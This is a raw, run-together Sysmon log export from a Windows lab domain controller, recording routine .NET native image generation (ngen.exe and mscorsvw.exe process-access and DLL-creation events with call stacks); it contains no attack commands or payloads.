13:23:05.671{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B9-6000-9902-000000009A01}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:05.609{08A6967A-45B9-6000-9802-000000009A01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\cd8-0\System.Reflection.Context.dll2021-01-14 13:23:05.609 10341000x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.452{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B9-6000-9802-000000009A01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.437{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B9-6000-9802-000000009A01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.437{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B9-6000-9802-000000009A01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.405{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B9-6000-9702-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.390{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B9-6000-9702-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.390{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B9-6000-9702-000000009A01}2876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:05.312{08A6967A-45B8-6000-9602-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1120-0\System.Printing.dll2021-01-14 13:23:05.312 11241100x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:06.952{08A6967A-45BA-6000-9E02-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\568-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-14 13:23:06.952 10341000x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.718{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BA-6000-9E02-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.702{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45BA-6000-9E02-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.702{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BA-6000-9E02-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.671{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BA-6000-9D02-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.655{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45BA-6000-9D02-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.655{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BA-6000-9D02-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:06.593{08A6967A-45BA-6000-9C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\650-0\System.Runtime.DurableInstancing.dll2021-01-14 13:23:06.593 10341000x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.218{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BA-6000-9C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.202{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45BA-6000-9C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.202{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BA-6000-9C02-000000009A01}1616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.062{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BA-6000-9B02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.062{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45BA-6000-9B02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:06.062{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BA-6000-9B02-000000009A01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:05.999{08A6967A-45B9-6000-9A02-000000009A01}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\115c-0\System.Runtime.Caching.dll2021-01-14 13:23:05.999 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.952{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BB-6000-A202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.937{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45BB-6000-A202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.937{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BB-6000-A202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.781{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BB-6000-A102-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.765{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45BB-6000-A102-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 